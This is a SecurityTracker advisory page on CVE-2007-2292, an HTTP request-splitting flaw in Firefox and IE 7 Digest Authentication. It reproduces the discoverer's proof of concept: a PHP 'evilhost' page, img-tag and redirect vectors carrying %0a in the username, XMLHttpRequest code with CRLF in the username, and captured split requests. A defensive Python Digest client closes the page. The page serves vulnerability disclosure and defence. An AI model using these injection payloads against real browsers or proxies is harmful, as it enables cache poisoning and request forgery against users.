SecurityTracker.com
Category:  Application (Web Browser) > Mozilla Firefox
Vendors:  Mozilla.org
Mozilla Firefox Digest Authentication Bug Lets Remote Users Conduct HTTP Request Splitting Attacks
SecurityTracker Alert ID:  1017968
SecurityTracker URL:  http://securitytracker.com/id?1017968
CVE Reference:  CVE-2007-2292
Updated:  Oct 19 2007
Original Entry Date:  Apr 26 2007
Impact:  Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes   Exploit Included:  Yes   Vendor Confirmed:  Yes  
Advisory:  Mozilla Foundation Security Advisory
Version(s): prior to 2.0.0.8
Description:  A vulnerability was reported in Mozilla Firefox. A remote user can conduct HTTP request splitting attacks.

A remote user (server) can return a specially crafted HTTP Digest Authentication value to cause the target client to generate a split request.

Stefano `Wisec` Di Paola discovered this vulnerability.

The original advisory is available at:

http://www.wisec.it/vulns.php?id=11

Impact:  A remote server can send an HTTP response that will cause an arbitrary request to be generated by the target user's browser.
Solution:  The vendor has issued a fixed version (2.0.0.8).

The Mozilla advisory is available at:

http://www.mozilla.org/security/announce/2007/mfsa2007-31.html

Vendor URL:  www.mozilla.org/security/announce/2007/mfsa2007-31.html
Cause:  Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  Stefano Di Paola <stefano.dipaola@wisec.it>
Message History:   None.


 Source Message Contents

Date:  Wed, 25 Apr 2007 19:37:26 +0200
From:  Stefano Di Paola <stefano.dipaola@wisec.it>
Subject:  IE 7 and Firefox Browsers Digest Authentication Request Splitting

 Title             IE 7 and Firefox Browsers Digest Authentication
                   Request Splitting

 Systems Affected  Internet Explorer 7.0.5730.11
                   FF 2.0.0.3

 Severity          Medium

 Vendor            http://www.microsoft.com/ & http://www.mozilla.com

 Advisory          http://www.wisec.it/vulns.php?id=11

 Authors           Stefano `Wisec` Di Paola (stefano.dipaola@wisec.it)

 Discovery Date    20070213

 Release Date      20070425

I) Short description

Firefox and Internet Explorer are prone to HTTP Request Splitting when
Digest Authentication occurs. If anyone wants to know about HTTP Request
Splitting, HTTP Request Splitting attacks are described in various
papers and advisories:

1. http://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf
2. http://www.webappsec.org/lists/websecurity/archive/2006-07/msg00069.html
3. http://download2.rapid7.com/r7-0026/
4. http://www.wisec.it/docs.php?id=4
   (About Auto Injection with Req.Split.)

II) Long description

As explained in RFC 2617 (http://www.ietf.org/rfc/rfc2617.txt), Digest
Authentication is a more secure way to exchange user credentials.

The RFC uses the following example:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
The first time the client requests the document, no Authorization
header is sent, so the server responds with:

HTTP/1.1 401 Unauthorized
WWW-Authenticate: Digest realm="testrealm@host.com",
                  qop="auth,auth-int",
                  nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093",
                  opaque="5ccc069c403ebaf9f0171e9517f40e41"

The client may prompt the user for the username and password, after
which it will respond with a new request, including the following
Authorization header:

Authorization: Digest username="Mufasa",
               realm="testrealm@host.com",
               nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093",
               uri="/dir/index.html",
               qop=auth,
               nc=00000001,
               cnonce="0a4f113b",
               response="6629fae49393a05397450978507c4ef1",
               opaque="5ccc069c403ebaf9f0171e9517f40e41"
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

So there's a response by the client (browser) with the username in clear.

There are two ways to send credentials in HTML/JavaScript:

x = new XMLHttpRequest();
x.open("GET", "page", async, "user", "pass");

And with img/iframes or related:

<img src="http://user:pass@host/paget">

But what if the username contains \r\n or urlencoded %0d%0a?

Let's use an Evil page like this:

--8<-- http://evilhost/req.php --8<--8<--8<--8<--8<--8<--8<--8<--8<--
<?php
header('Set-Cookie: PHPSESSID=6555');
if ((int)intval($_COOKIE['PHPSESSID']) !== 6555) {
    // First visit: demand Digest authentication once.
    header('HTTP/1.0 401 Authorization Required');
    header('WWW-Authenticate: Digest realm="1@example.com", '
         . 'qop="auth,auth-int", nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", '
         . 'opaque="5ccc069c403ebaf9f0171e9517f40e41"');
    header('Proxy-Connection: keep-alive');
} else {
    // Second visit (cookie already set): serve the page on a kept-alive connection.
    // header("Set-Cookie: PHPSESSID=0");
    header('Connection: keep-alive');
?>
<html><head>
<meta http-equiv='Connection' content="keep-alive"></head>
<body><script>
// Some printing in order to show document DOM properties
// in the poisoned page
for (var i in document) document.write(i + ' ' + eval('document.' + i) + '<br>');
</script>
</body>
</html>
<?php } ?>
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Which asks for a digest authentication only once.

III) Direct URL Authentication

Let's try it with Firefox:

<img id="d" src="http://user%0aname:pp@evilhost/req.php">

Let's see what happens after the first request:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
HTTP/1.1 401 Authorization Required
Set-Cookie: PHPSESSID=6555
WWW-Authenticate: Digest realm="1@example.com", qop="auth,auth-int",nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093",\ opaque="5ccc069c403ebaf9f0171e9517f40e41"
Proxy-Connection: keep-alive
Connection: keep-alive, Keep-Alive
Content-Length: 146
Keep-Alive: timeout=15, max=100
Content-Type: text/html; charset=UTF-8
...
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

and then Firefox resends its request:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
GET req.php HTTP/1.1
Host: at.tack.er
User-Agent: Mozilla/5.0 (X11; U; Linux i686; it; rv:1.8.1.3) Gecko/20060601 Firefox/2.0.0.3 (Ubuntu-edgy)
Keep-Alive: 300
Connection: keep-alive
Authorization: Digest username="user
name", realm="1@example.com", nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", uri="/req.php", response="e398c5c7583b4ca115978c486bb766f8", opaque="5ccc069c403ebaf9f0171e9517f40e41", qop=auth, nc=00000001, cnonce="58e1c23271698745"
Cookie: PHPSESSID=6555
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Everyone can see there's a splitting where the %0a was.

The rest of the story is straightforward: an attacker could inject a
second request, and in the presence of a proxy (about 2 million people
use it), a request splitting attack could be accomplished.

IV) Firefox Add-On

A redirection could be used:

<img src="http://evilhost/redir.php">

With redir.php:

<?php
header("Location: http://user%0aname:ds@avilhost/req.php");
?>

Or by using various redirectors around the web.

Note: Internet Explorer 7 is not vulnerable with imgs nor with other
direct requests.

V) XMLHttpRequest Authentication

IE 7 and Firefox are both vulnerable.

Let's use a standard request with XMLHttpRequest:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
x = new XMLHttpRequest();
x.open("POST", "req.php?", false, "user\r\nname", "pass");
x.setRequestHeader("Proxy-Connection", "keep-alive");
x.onreadystatechange = function () {
    if (x.readyState == 4) {
    }
};
// The payload with a request to a page with evil content
x.send("RequestPayload");
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

This will result in a similar splitting to the one with image tags.

What could you do with these splittings? A lot; one for all is that, in
the presence of a proxy, the local cache could be poisoned. But for some
more attacks have a look at the references.

Note: there is some difference between IE and Firefox, but I'll leave
that to you as homework.

CREDIT
------

Stefano di Paola is credited with the discovery of this vulnerability.

LEGAL NOTICES
-------------

Copyright (c) 2007 Stefano di Paola

Note: this exploit is DUAL LICENSED,

1. if you'll use it for personal and non-profit purposes you can
   apply GPL v2 and above.

2. In the case you plan to:
   a. use our code in any commercial context
   b. implement this code in your non-GPL application
   c. use this code during a Penetration Test
   d. make any profit from it

   you need to contact me in order to obtain a _commercial license_.

For more information about Dual Licensing:
http://producingoss.com/html-chunk/dual-licensing.html

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without my express
written consent. If you wish to reprint the whole or any part of this
alert in any other medium other than electronically, please email me for
permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

-- 
...oOOo...oOOo....
Stefano Di Paola
Software & Security Engineer
Web: www.wisec.it
..................
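The check whose absence the advisory demonstrates, as an added example that is neither the advisory's nor Mozilla's code: a small Digest client that builds the RFC 2617 Authorization header and refuses any parameter containing CR, LF or another control character, so a username such as user%0aname (from an img URL) or "user\r\nname" (from XMLHttpRequest) can never reach the wire. It is checked against the RFC's Mufasa example; the password "Circle Of Life" comes from RFC 2617, not from this page, and userinfo_from_url, build_authorization and the helper names are this example's own.

```python
import hashlib
import re
from urllib.parse import unquote, urlsplit

# Added example, not code from the advisory or from Mozilla: a Digest client
# that builds the RFC 2617 Authorization header and refuses any parameter
# carrying CR, LF or another control character. The missing check is what
# lets "user%0aname" (img URL) or "user\r\nname" (XMLHttpRequest) split
# the request into two.

_CTL = re.compile(r"[\x00-\x1f\x7f]")

def _h(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()

def _safe(name: str, value: str) -> None:
    """Reject header-injection characters before the value hits the wire."""
    if _CTL.search(value) or '"' in value:
        raise ValueError(f"illegal character in Digest parameter {name!r}")

def userinfo_from_url(url: str):
    """Percent-decode user:pass from a URL the way a browser does before
    authenticating, so %0a is already a real LF when it reaches _safe()."""
    netloc = urlsplit(url).netloc
    if "@" not in netloc:
        return None
    user, _, pw = netloc.rsplit("@", 1)[0].partition(":")
    return unquote(user), unquote(pw)

def build_authorization(username, password, method, uri, realm, nonce,
                        cnonce, nc="00000001", qop="auth", opaque=None):
    """Return the Authorization line for qop=auth (RFC 2617 section 3.2.2)."""
    fields = {"username": username, "realm": realm, "nonce": nonce,
              "uri": uri, "cnonce": cnonce, "nc": nc, "qop": qop}
    if opaque is not None:
        fields["opaque"] = opaque
    for name, value in fields.items():
        _safe(name, value)
    ha1 = _h(f"{username}:{realm}:{password}")
    ha2 = _h(f"{method}:{uri}")
    response = _h(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    params = [f'username="{username}"', f'realm="{realm}"', f'nonce="{nonce}"',
              f'uri="{uri}"', f"qop={qop}", f"nc={nc}", f'cnonce="{cnonce}"',
              f'response="{response}"']
    if opaque is not None:
        params.append(f'opaque="{opaque}"')
    return "Authorization: Digest " + ", ".join(params)
```

Feeding the advisory's img URL through userinfo_from_url and then build_authorization raises ValueError instead of emitting the split header shown in the Firefox capture above.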



Copyright 2007, SecurityGlobal.net LLC